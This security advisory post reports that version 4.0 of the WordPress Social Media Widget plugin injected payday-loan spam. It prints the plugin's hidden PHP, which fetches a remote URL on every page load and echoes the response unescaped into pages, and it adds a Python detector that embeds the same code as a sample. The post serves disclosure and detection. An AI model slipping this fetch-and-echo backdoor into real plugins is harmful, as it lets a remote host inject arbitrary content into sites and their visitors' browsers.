WordPress Plugin Social Media Widget Hiding Spam – Remove it now

If you are using the plugin Social Media Widget (social-media-widget), make sure to remove it asap from your web site. We discovered it is being used to inject spam into web sites and the plugin was just removed from the WordPress Plugin repository.

This is a very popular plugin with more than 900,000 downloads. So it is likely affecting a lot of web sites.


Technical details

The plugin has a hidden call to this URL: httx://i.aaur.net/i.php, which is used to inject “Pay Day Loan” spam into the web sites running the plugin. This is how it looks in the browser:

function nemoViewState( ){
var a=0,m,v,t,z,x=new …
<p class="nemonn"><a href="httx://paydaypam.co. uk/" title="Payday Loan">payday loans

The malicious code was added only 12 days ago, when version 4.0 of the plugin was released. So we are recommending that everyone removes that plugin asap until we have more information. Our free sitecheck scanner does identify if your site has been injected with this type of spam.

This is the full code that was added to the plugin:

$smw_url = "http://i.aaur.net/i.php";   // remote spam source, fetched on every page load
if(!function_exists("smw_get")){
    function smw_get($f) {
        // First try the WordPress HTTP API...
        $response = wp_remote_get( $f );
        if( is_wp_error( $response ) ) {
            // ...and fall back to raw cURL if that fails, so the injection still works
            function smw_get_body($f) {
                $ch = @curl_init();
                @curl_setopt($ch, CURLOPT_URL, $f);
                @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                $output = @curl_exec($ch);
                @curl_close($ch);
                return $output;
            }
            echo smw_get_body($f);
        } else {
            // Whatever the remote server returns is printed into the page unescaped
            echo $response["body"];
        }
    }
    smw_get($smw_url);
}
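The two things a site owner can check for are the ones the post shows: plugin source that fetches a remote URL and echoes the body straight into the page (the PHP above), and the markers the injection leaves in rendered HTML (the nemoViewState function and the nemonn class from the browser view). The following scanner is an added example, not code from the original post or from the plugin. It tracks variables filled by wp_remote_get()/curl_exec()/file_get_contents() and flags any echo of them (or of a function that returns them), and it looks for the callback host and HTML markers named in the post. The sample plugin excerpts and HTML below are constructed for the example; the benign excerpt and the example.invalid link are not from the page.

```python
"""Heuristic detector for the remote-fetch-and-echo spam injection pattern.

Added example; not the plugin's code and not the post's own tooling. The
indicators (callback host, nemoViewState, nemonn) come from the post; the
taint-tracking regexes are a deliberately simple, line-based approximation.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Indicators taken from the post.
KNOWN_HOSTS = ("i.aaur.net",)
HTML_MARKERS = ("nemoViewState", 'class="nemonn"')

FUNC_DEF = re.compile(r"\bfunction\s+(\w+)\s*\(")
# "$var = wp_remote_get(" / "$var = @curl_exec(" / "$var = file_get_contents("
ASSIGN_FETCH = re.compile(r"\$(\w+)\s*=\s*@?(wp_remote_get|curl_exec|file_get_contents)\s*\(")
RETURN_VAR = re.compile(r"\breturn\s+\$(\w+)\s*;")
# "echo $var;" or "echo $var['body'];"  (an echo wrapped in esc_html() etc. does not match)
ECHO_VAR = re.compile(r"\becho\s+\$(\w+)\s*(?:\[[^\]]*\])?\s*;")
ECHO_CALL = re.compile(r"\becho\s+(\w+)\s*\(")


@dataclass
class Finding:
    line: int
    kind: str
    detail: str


def scan_php_source(src: str) -> List[Finding]:
    """Flag known hosts and echoes of remotely fetched content in plugin PHP."""
    lines = src.splitlines()
    fetched: Dict[str, str] = {}      # variable name -> fetch function that filled it
    tainted_funcs: Set[str] = set()   # functions that return a fetched variable
    current_func = None

    # Pass 1: taint propagation. Line-based: a nested function definition simply
    # becomes the "current" function, which is enough for the pattern in the post.
    for text in lines:
        m = FUNC_DEF.search(text)
        if m:
            current_func = m.group(1)
        for m in ASSIGN_FETCH.finditer(text):
            fetched[m.group(1)] = m.group(2)
        for m in RETURN_VAR.finditer(text):
            if m.group(1) in fetched and current_func:
                tainted_funcs.add(current_func)

    # Pass 2: report.
    findings: List[Finding] = []
    for n, text in enumerate(lines, 1):
        for host in KNOWN_HOSTS:
            if host in text:
                findings.append(Finding(n, "known-host", host))
        for m in ECHO_VAR.finditer(text):
            if m.group(1) in fetched:
                findings.append(Finding(n, "echo-remote-body",
                                        f"${m.group(1)} from {fetched[m.group(1)]}()"))
        for m in ECHO_CALL.finditer(text):
            if m.group(1) in tainted_funcs:
                findings.append(Finding(n, "echo-remote-body",
                                        f"{m.group(1)}() returns remote content"))
    return findings


def scan_rendered_html(html: str) -> List[str]:
    """Return the injection markers from the post that appear in a rendered page."""
    return [marker for marker in HTML_MARKERS if marker in html]


# Constructed sample: the structure of the code quoted in the post.
MALICIOUS_PLUGIN_SAMPLE = """<?php
$smw_url = "http://i.aaur.net/i.php";
if(!function_exists("smw_get")){
function smw_get($f) {
$response = wp_remote_get( $f );
if( is_wp_error( $response ) ) {
function smw_get_body($f) {
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL, $f);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = @curl_exec($ch);
@curl_close($ch);
return $output;
}
echo smw_get_body($f);
} else {
echo $response["body"];
}
}
smw_get($smw_url);
}
"""

# Constructed benign sample: a remote fetch whose output is escaped before printing.
BENIGN_PLUGIN_SAMPLE = """<?php
$r = wp_remote_get( $url );
echo esc_html( wp_remote_retrieve_body( $r ) );
"""

# Constructed sample of the injected output; the link target is a placeholder.
INJECTED_HTML_SAMPLE = """<script>function nemoViewState( ){ var a=0,m,v,t,z; }</script>
<p class="nemonn"><a href="httx://example.invalid/" title="Payday Loan">payday loans</a></p>
"""

if __name__ == "__main__":
    for f in scan_php_source(MALICIOUS_PLUGIN_SAMPLE):
        print(f"line {f.line}: {f.kind}: {f.detail}")
    print("benign findings:", scan_php_source(BENIGN_PLUGIN_SAMPLE))
    print("html markers:", scan_rendered_html(INJECTED_HTML_SAMPLE))
```

Run it against a copy of wp-content/plugins/<plugin>/*.php and against a fetched copy of the front page; the source check catches the fetch-and-echo pattern even if the callback host changes, while the HTML check only matches the specific markers this campaign used.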

We will post more details as we investigate this further.

Read more: WordPress Plugin Social Media Widget Hiding Spam – Remove it now

Story added 9 April 2013; the content source with the full text can be found at the link above.